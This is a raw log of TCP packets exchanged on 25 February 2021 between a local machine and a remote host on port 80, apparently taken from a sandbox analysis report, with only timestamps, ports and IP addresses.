Feb 25, 2021 11:04:07.829585075 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.829600096 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.829605103 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.829617977 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.829633951 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.829648972 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.829652071 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.829665899 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.829682112 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.829694033 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.829698086 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.829714060 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.829721928 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.829732895 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.829750061 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.829756975 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.829766035 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.829777002 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.829807043 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.830516100 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.830545902 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.830564022 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.830579042 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.830595016 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.830600977 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.830610037 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.830629110 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.830638885 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.830646038 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.830661058 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.830662966 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.830676079 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.830686092 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.830693960 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.830708027 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.830722094 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.830734968 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.830737114 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.830780983 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.831455946 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.831484079 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.831500053 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.831522942 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.831527948 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.831547022 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.831558943 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.831568003 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.831569910 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.831578016 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.831588984 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.831598997 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.831609011 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.831618071 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.831625938 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.831643105 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.831650019 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.831657887 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.831672907 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.831703901 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.832467079 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.832475901 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.832482100 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.832508087 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.832523108 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.832528114 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.832537889 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.832552910 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.832556009 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.832567930 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.832582951 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.832591057 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.832600117 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.832604885 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.832609892 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.832623005 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.832640886 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.832653999 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.832658052 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.832715988 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.833425999 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.833451033 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.833466053 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.833481073 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.833498955 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.833514929 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.833514929 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.833529949 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.833543062 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.833545923 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.833559990 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.833568096 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.833580971 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.833590031 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.833595037 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.833596945 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.833612919 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.833625078 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.833626986 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.833657980 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.833688021 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.834373951 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.834398985 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.834414959 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.834429979 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.834439039 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.834445000 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.834460020 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.834475040 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.834481001 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.834490061 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.834507942 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.834517956 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.834523916 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.834538937 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.834547997 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.834553957 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.834568024 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.834569931 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.834583044 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.834599018 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.834618092 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.835331917 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.835362911 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.835380077 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.835397005 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.835406065 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.835417986 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.835426092 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.835463047 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.835489988 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.835735083 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.835757017 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.835783005 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.835788012 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.835800886 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.835804939 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.835820913 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.835836887 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.835853100 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.835859060 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.835867882 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.835884094 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.835899115 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.835900068 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.835921049 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.835931063 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.835935116 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.835953951 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.836002111 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.836035967 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.836718082 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.836743116 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.836760998 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.836771011 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.836782932 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.836795092 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.836796045 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.836807966 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.836824894 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.836837053 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.836841106 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.836860895 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.836872101 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.836878061 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.836896896 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.836905956 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.836909056 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.836921930 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.836962938 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.837002039 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.837696075 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.837723017 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.837738037 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.837755919 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.837773085 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.837784052 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.837790012 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.837806940 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.837806940 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.837831020 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.837835073 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.837835073 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.837852955 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.837865114 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.837877035 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.837881088 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.837896109 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.837910891 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.837915897 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.837939978 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.837965012 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.838682890 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.838701963 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.838717937 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.838737011 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.838749886 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.838762045 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.838778019 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.838793039 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.838798046 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.838814974 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.838829994 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.838840961 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.838845015 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.838860989 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.838876963 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.838882923 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.838897943 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.838903904 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.838921070 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.838968039 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.839626074 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.839656115 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.839663029 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.839679956 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.839695930 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.839711905 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.839730978 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.839740038 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.839749098 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.839757919 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.839766026 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.839781046 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.839791059 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.839802027 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.839807987 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.839823961 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.839838982 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.839842081 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.839875937 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.839898109 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.840611935 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.840634108 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.840650082 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.840666056 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.840682030 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.840684891 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.840698004 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.840723991 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.840729952 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.840738058 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.840749979 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.840766907 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.840770006 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.840783119 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.840802908 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.840816021 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.840818882 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.840835094 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.840858936 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.840898991 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.841584921 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.841612101 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.841629028 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.841644049 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.841659069 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.841664076 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.841670990 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.841684103 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.841715097 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.841974020 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.841989994 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.842008114 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.842025995 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.842035055 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.842040062 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.842047930 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.842061043 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.842076063 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.842089891 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.842097998 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.842108965 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.842128992 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.842197895 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.885262012 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.947700977 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.947745085 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.947772026 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.947798014 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.947824001 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.947848082 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.947871923 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.947891951 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.947917938 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.947942019 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.947954893 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.947968960 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.947982073 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.947993994 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.948004961 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.948021889 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.948040009 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.948045969 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.948070049 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.948086977 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.948092937 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.948117018 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.948141098 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.948141098 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.948168039 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.948189020 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.948194027 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.948219061 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.948235035 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.948242903 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.948266983 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.948281050 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.948290110 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.948313951 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.948328972 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.948337078 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.948364973 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.948374987 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.948390007 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.948414087 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.948427916 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.948437929 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.948462963 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.948477030 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.948487997 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.948510885 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.948534966 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.948535919 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.948564053 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.948580980 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.948589087 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.948610067 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.948633909 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.948637009 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.948668957 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.949006081 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.949033976 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.949054003 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.949078083 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.949099064 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.949104071 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.949130058 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.949131012 CET	49716	80	192.168.2.5	172.67.172.17
Feb 25, 2021 11:04:07.949152946 CET	80	49716	172.67.172.17	192.168.2.5
Feb 25, 2021 11:04:07.949177980 CET	80	49716	172.67.172.17	192.168.2.5
